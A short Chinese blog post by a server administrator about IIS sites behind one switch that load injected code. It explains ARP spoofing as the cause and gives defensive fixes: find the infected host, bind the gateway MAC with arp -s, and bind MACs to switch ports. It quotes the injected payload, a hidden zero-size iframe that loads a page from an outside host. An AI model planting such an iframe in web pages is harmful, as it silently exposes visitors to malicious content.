郁闷,那台交换机下的服务器上的IIS网站,如果在哪打开,都加载一段代码..

郁闷,那台交换机下的服务器上的IIS网站,如果在哪打开,都加载一段代码..
<iframe src=http://i52o.cn/admin/51.htm width=20 height=0 frameborder=0></iframe>

郁闷..
ARP攻击:导致瞬间掉线和大面积断网的罪魁祸首。在局域网中,通过ARP协议来进行IP地址(第三层)与第二层物理地址(即MAC地址)的相互转换。网吧中的一些设备如路由器、装有TCP/IP协议的电脑等都提供ARP缓存表,以提高通信速度。目前很多带有ARP欺骗功能的攻击软件都是利用ARP协议的这个特点来对网络设备进行攻击,通过伪造的MAC与局域网内的IP地址对应,并修改路由器或电脑的ARP缓存表,使得具有合法MAC的电脑无法与IP对应,从而无法通过路由器上网。

说白一点,就是你要访问网络的时候需要通过一个服务器,但是中毒的主机,就会在中间截住服务器发给你的数据包,并在中间加上他的内容以后再发给你。这样,你要看的网页就会多出来一段代码。

中毒的主机要想用ARP攻击,就得不断变化自己的MAC地址来截取和发送数据包..用其它地方机器,tracert 看看是否通过怀疑中毒的那台机子…(看交换机上哪能个口的流量最大,灯狂闪,80%以上就是它了[angry])

查清楚网关的MAC地址,,然后绑定吧…
命令:
arp -s 192.168.1.1  00-**-**-**-**-**

然后把那台死病毒机,查出来.下架.然后…………………….狂扁它!!!

注意:
在下架中毒服务器的时候,如果交换机下的其它服务器被它骗的,那其它服务器也会中断,

请在下架中了病毒服务器的时候,立刻重启交换机…

建议:
现在很多交换机都支持端口绑定MAC,绑定那个口,就行了..

0
如无特殊说明,文章均为本站原创,转载请注明出处

该文章由 发布

这货来去如风,什么鬼都没留下!!!
发表我的评论

Hi,请填写昵称和邮箱!

取消评论
代码 贴图 加粗 链接 删除线 签到